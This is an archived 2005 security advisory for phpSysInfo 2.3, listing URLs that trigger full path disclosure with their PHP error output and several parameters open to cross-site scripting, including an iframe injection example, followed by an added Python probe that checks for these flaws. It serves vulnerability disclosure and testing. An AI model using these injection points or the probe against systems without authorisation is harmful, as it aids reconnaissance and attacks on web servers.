phpSysInfo23.txt

24 Mar 2005 00:00:00, reported by Maksymilian Arciemowicz. Type: packetstorm. Source: packetstormsecurity.com

PHPSysInfo 2.3 has multiple vulnerabilities leading to full path disclosure attacks.

Code
`  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[phpSysInfo 2.3 Multiple vulnerabilities cXIb8O3.11]  
  
Author: Maksymilian Arciemowicz (cXIb8O3)  
Date: 22.3.2005  
from SECURITYREASON.COM TEAM  
  
  
- --- 0.Description ---  
PHPSysInfo 2.3 is a customizable PHP script that parses /proc and formats the information nicely. It will display information about system facts like Uptime, CPU, Memory, PCI devices, SCSI devices, IDE devices, Network adapters, Disk usage, and more.  
  
  
- --- 1. Full Path Disclosure ---  
1.0  
http://[host]/[DIR]/includes/os/class.OpenBSD.inc.php  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.OpenBSD.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.OpenBSD.inc.php on line 22  
- ---------------  
  
1.1  
http://[host]/[DIR]/includes/os/class.NetBSD.inc.php  
  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.NetBSD.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.NetBSD.inc.php on line 22  
- ---------------  
  
  
1.2  
http://[host]/[DIR]/includes/os/class.FreeBSD.inc.php  
  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.FreeBSD.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.FreeBSD.inc.php on line 22  
- ---------------  
  
  
1.3  
http://[host]/[DIR]/includes/os/class.Darwin.inc.php  
  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.Darwin.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.Darwin.inc.php on line 22  
- ---------------  
  
  
1.4  
http://[host]/[DIR]/includes/XPath.class.php  
  
Error message :  
- ---------------  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056  
  
...  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974  
- ---------------  
  
  
1.5  
http://[host]/[DIR]/includes/system_header.php  
  
Error message :  
- ---------------  
Fatal error: Call to undefined function created_by() in /www/phpsysinfo-dev/includes/system_header.php on line 39  
- ---------------  
  
  
1.6  
http://[host]/[DIR]/includes/system_footer.php  
  
Error message :  
- ---------------  
Warning: opendir(templates/) [function.opendir]: failed to open dir: No such file or directory in /www/phpsysinfo-dev/includes/system_footer.php on line 21  
  
Warning: readdir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 22  
  
Warning: closedir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 27  
  
Warning: asort() expects parameter 1 to be array, null given in /www/phpsysinfo-dev/includes/system_footer.php on line 29  
  
Warning: Variable passed to each() is not an array or object in /www/phpsysinfo-dev/includes/system_footer.php on line 31  
  
Warning: opendir(includes/lang/) [function.opendir]: failed to open dir: No such file or directory in /www/phpsysinfo-dev/includes/system_footer.php on line 53  
  
Warning: readdir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 54  
  
Warning: closedir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 59  
  
Warning: asort() expects parameter 1 to be array, null given in /www/phpsysinfo-dev/includes/system_footer.php on line 61  
  
Warning: Variable passed to each() is not an array or object in /www/phpsysinfo-dev/includes/system_footer.php on line 63  
- ---------------  
  
  
- --- 2. XSS aka Cross Site Scripting ---  
Requires register_globals=On:  
  
2.0  
http://[host]/[DIR]/index.php?sensor_program=[XSS]  
  
2.1  
  
http://[host]/[DIR]/includes/system_footer.php?text[language]=">[XSS]  
  
http://[host]/[DIR]/includes/system_footer.php?text[template]=">[XSS]  
  
http://[host]/[DIR]/includes/system_footer.php?hide_picklist=cXIb8O3&VERSION=<iframe src=http://securityreason.com>  
  
etc.  
  
  
- --- 3. How to fix ---  
  
Download my patch.  
http://securityreason.com/patch/phpSysInfo-2.3.patch.by.cXIb8O3.tar.gz  
  
- --- 4. Greets ---  
  
sp3x.   
  
good adv.. => coming soon....  
  
- --- 5.Contact ---  
Author: Maksymilian Arciemowicz ( cXIb8O3 )  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: http://www.securityreason.com  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCQa+1znmvyJCR4zQRAsNAAJ9mmONeqABZoS1CwMj4hRqAzjxHdgCfTRu7  
Am3hGy9bgcms4OHoCcHMDP4=  
=20uz  
-----END PGP SIGNATURE-----  
`
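Added example (Python; not code from the advisory, from SecurityReason or from the phpSysInfo project): a probe for sections 1 and 2 above. It requests each include file the advisory lists, pulls the absolute path out of the PHP warning text ("in /path/file.php on line N"), derives the install directory by stripping the relative path that was requested, and then checks whether the listed parameters reflect a harmless marker without HTML escaping. The host name, the marker string and the sample response bodies are constructed for this example; the sample bodies are modelled on the advisory's error output, not on captured traffic.

```python
"""Probe for the phpSysInfo 2.3 full path disclosure and XSS issues.
Added example, not code from the advisory or the phpSysInfo project.
Host, marker and sample responses are constructed so it runs offline;
swap `fetch` for a real HTTP client on a host you are authorised to test."""
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import quote

# Relative paths the advisory (section 1) shows leaking their absolute location.
FPD_PATHS = [
    "includes/os/class.OpenBSD.inc.php",
    "includes/os/class.NetBSD.inc.php",
    "includes/os/class.FreeBSD.inc.php",
    "includes/os/class.Darwin.inc.php",
    "includes/XPath.class.php",
    "includes/system_header.php",
    "includes/system_footer.php",
]
# (script, parameter) pairs the advisory (section 2) lists as reflected when register_globals=On.
XSS_PARAMS = [
    ("index.php", "sensor_program"),
    ("includes/system_footer.php", "text[language]"),
    ("includes/system_footer.php", "text[template]"),
    ("includes/system_footer.php", "VERSION"),
]
# PHP warnings and fatals end with "in <absolute path> on line <n>"; the
# relative path inside main(...) is not preceded by "in " and is skipped.
PHP_ERROR_RE = re.compile(r"\bin (/\S+?\.php) on line (\d+)")
MARKER = "<probe-7f3a>"  # constructed, harmless: only tests for unescaped reflection


def extract_paths(body: str) -> List[Tuple[str, int]]:
    """Unique (absolute_path, line) pairs disclosed in PHP error text, in order."""
    found: List[Tuple[str, int]] = []
    for path, line in PHP_ERROR_RE.findall(body):
        if (path, int(line)) not in found:
            found.append((path, int(line)))
    return found


def install_dir(disclosed: str, requested_rel: str) -> Optional[str]:
    """Install directory = disclosed absolute path minus the relative path we requested."""
    suffix = "/" + requested_rel
    if disclosed.endswith(suffix):
        return disclosed[: -len(suffix)] or "/"
    return None


def xss_url(base_url: str, script: str, param: str, marker: str = MARKER) -> str:
    """Build the probe URL; brackets are kept so PHP still parses text[...] as an array."""
    return f"{base_url}/{script}?{quote(param, safe='[]')}={quote(marker)}"


def probe(base_url: str, fetch: Callable[[str], str]) -> Dict[str, object]:
    """Run every check; `fetch` maps a URL to a response body (text)."""
    fpd: Dict[str, List[Tuple[str, int]]] = {}
    roots = set()
    for rel in FPD_PATHS:
        paths = extract_paths(fetch(f"{base_url}/{rel}"))
        if paths:
            fpd[rel] = paths
            for path, _ in paths:
                root = install_dir(path, rel)
                if root:
                    roots.add(root)
    xss = []
    for script, param in XSS_PARAMS:
        # htmlspecialchars() would turn '<' into '&lt;', so a raw hit means no escaping.
        if MARKER in fetch(xss_url(base_url, script, param)):
            xss.append((script, param))
    return {"fpd": fpd, "install_dirs": sorted(roots), "xss": xss}


def constructed_responses(base_url: str) -> Dict[str, str]:
    """Sample bodies modelled on the advisory's error output (constructed, not captured)."""
    bsd = ("Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: "
           "No such file or directory in /www/phpsysinfo-dev/includes/os/{f} on line 22\n"
           "Fatal error: main() [function.require]: Failed opening required "
           "'./includes/os/class.BSD.common.inc.php' (include_path='.:') "
           "in /www/phpsysinfo-dev/includes/os/{f} on line 22\n")
    r = {f"{base_url}/includes/os/{f}": bsd.format(f=f) for f in
         ("class.OpenBSD.inc.php", "class.NetBSD.inc.php", "class.FreeBSD.inc.php", "class.Darwin.inc.php")}
    r[f"{base_url}/includes/XPath.class.php"] = (
        "Warning: array_merge() [function.array-merge]: Argument #2 is not an array "
        "in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056\n"
        "Warning: array_merge() [function.array-merge]: Argument #2 is not an array "
        "in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974\n")
    r[f"{base_url}/includes/system_header.php"] = (
        "Fatal error: Call to undefined function created_by() "
        "in /www/phpsysinfo-dev/includes/system_header.php on line 39\n")
    r[f"{base_url}/includes/system_footer.php"] = (
        "Warning: opendir(templates/) [function.opendir]: failed to open dir: No such file or directory "
        "in /www/phpsysinfo-dev/includes/system_footer.php on line 21\n")
    # A footer that echoes text['language'] into markup without escaping (constructed).
    r[xss_url(base_url, "includes/system_footer.php", "text[language]")] = (
        f'<option value="{MARKER}">{MARKER}</option>\n')
    return r


def demo(base_url: str = "http://target.example/phpsysinfo") -> Dict[str, object]:
    """Offline run against the constructed responses; unknown URLs return an empty body."""
    responses = constructed_responses(base_url)
    return probe(base_url, lambda url: responses.get(url, ""))


if __name__ == "__main__":
    print(demo())
```

`demo()` runs the offline version; for a real target, pass a `fetch` built on `urllib.request.urlopen(url).read().decode()`. Two caveats worth keeping in mind: the path-disclosure checks find nothing when PHP's `display_errors` is off, which is the generic mitigation for section 1 independent of the advisory's patch, and the reflection checks are only meaningful with `register_globals=On`, the precondition the advisory states for section 2. The probe never sends anything beyond the marker, so a hit tells you the parameter is echoed unescaped, not that a specific payload works in a specific browser.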
